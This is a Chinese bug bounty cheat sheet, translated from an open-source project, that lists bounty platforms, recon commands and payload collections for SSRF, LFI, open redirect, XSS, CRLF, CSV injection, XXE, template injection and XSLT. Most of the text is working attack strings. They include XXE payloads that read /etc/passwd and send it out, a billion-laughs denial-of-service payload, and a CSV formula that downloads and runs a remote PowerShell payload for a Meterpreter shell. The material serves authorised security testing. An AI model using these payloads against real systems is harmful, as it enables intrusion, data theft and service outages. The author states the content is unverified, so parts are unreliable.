众测备忘手册
前言
最近一直在看bugbountyforum对赏金猎人采访的文章以及一些分享姿势的PPT,所以结合bugbounty-cheatsheet项目对他们使用的工具,方法和思路进行整理。这里只是一个列表,并不是很详细,常见的姿势也不会被写上,还需要慢慢填充。
众测平台
HackerOne, Bugcrowd, BountyFactory,Intigriti,Bugbountyjp,Synack,Zerocopter,Cobalt,Yogosha
工具以及一些tips
在线域名信息收集:
https://dnsdumpster.com
http://threatcrowd.org
https://publicwww.com(可以搜索js、css中的域名,收费)
http://reverseip.domaintools.com(C段)
https://mxtoolbox.com
https://virustotal.com
https://crt.sh/?q=%25.uber.com
https://google.com/transparencyreport/https/ct/
https://pentest-tools.com/information-gathering/google-hacking
https://censys.io/certificates?q=
域名收集工具的小tips
利用sublist3r.py收集多个网站的子域名,下面的命令会从domains文件获取网站,然后输出子域名到对应的txt文件中
cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt
利用apktool和linkfinder获取APP中的域名信息(前提是APP未加密混淆)
apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5sum | cut -d' ' -f1).smali" \;; python /root/linkfinder/linkfinder.py -i 'collection/*.smali' -o cli
以某APP为例
详细输出结果可以在output.html中找到
Aquatone域名收集神器简化命令
将aquatone-discover -d $1 && aquatone-scan -d $1 --ports huge && aquatone-takeover -d $1 && aquatone-gather -d $1 写入aqua.sh ./aqua.sh xx.com
获取页面中所有的链接
lynx -dump http://www.xxxxx.com/ | awk '/http/{print $2}'
还有几款经常被提到的工具Intrigue-core、massdns、EyeWitness。
漏洞payload和绕过姿势
SSRF:
http://0177.1/ http://0x7f.1/ https://520968996(利用网站 http://www.subnetmask.info/) IPv6 http://[::1] http://[::]
Wildcard DNS(例:乌云多数已修复SSRF漏洞可被绕过)
http://xip.io http://nip.io
监控DNS解析和HTTP访问记录的网站(类似dnslog/ceye,姿势参考freebuf《HTTP盲攻击》)
http://dnsbin.zhack.ca (DNS) http://pingb.in (DNS) http://requestb.in (HTTP) https://www.mockbin.org/ (HTTP)
LFI:
../\ ..\/ /..\ /.. /%5c.. FFmpeg Local File Disclosure(搜狐优酷腾讯都出现过。)(https://github.com/neex/ffmpeg-avi-m3u-x bin/blob/master/gen_xbin_avi.py)
OPEN REDIRECT:
/%09/google.com /%5cgoogle.com //www.google.com/%2f%2e%2e //www.google.com/%2e%2e //google.com/ //google.com/%2f.. example.com%[email protected](bypass) 其他的一些payload https://github.com/cujanovic/Open-Redirect-Payloads
XSS :
先知XSS挑战赛writeup:http://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A
一个通用的xss payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
绕过url处的校验
javas	cript://www.google.com/%0Aalert(1)
Markdown XSS
[a](javascript:confirm(1) [a](javascript://www.google.com%0Aprompt(1)) [a](javascript://%0d%0aconfirm(1)) [a](javascript://%0d%0aconfirm(1);com) [a](javascript:window.onerror=confirm;throw%201) [a]: (javascript:prompt(1))
FLASH SWF XSS
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);// (国内一些框架之前出过这个问题,如thinkphp)
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
Angular JS模板注入
CRLF:
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
利用跳转进行CRLF
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
利用crlf进行xss
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
参考:https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html
CSV Injection:
%0A-3+3+cmd|' /C calc'!D2 Meterpreter Shell =cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0 参考:http://bobao.360.cn/learning/detail/2997.html
XXE Injection:
文件读取:
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo> 外带数据(第一次请求不会返回数据) <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo> PHP案例 <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]> <foo><result>∾</result></foo>
检测SSRF
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
XEE(拒绝服务https://yq.aliyun.com/articles/8723)
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> XEE(远程攻击) <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY test SYSTEM "https://example.com/entity1.xml">]> <lolz><lol>3..2..1...&test<lol></lolz>
利用ftp协议传输数据(搜狗某站文件读取/列目录-Java环境Blind XXE)
详细:http://www.freebuf.com/articles/web/97833.html
https://github.com/RUB-NDS/DTD-Attacks
模板注入:
Ruby
<%=`id`%>
Twig
{{7*'7'}} 输出49
Jinja
{{7*'7'}}输出7777777
XSLT 注入
获取信息
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>
PHP利用
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
</body>
</html>
尾声
本文根据开源项目bugbounty-cheatsheet(https://github.com/EdOverflow/bugbounty-cheatsheet/)翻译总结而成,由于译者时间比较紧张,未做详细验证,所以文章中有什么错误或者表哥想贡献思路,可以加我的微信bbqcms反馈。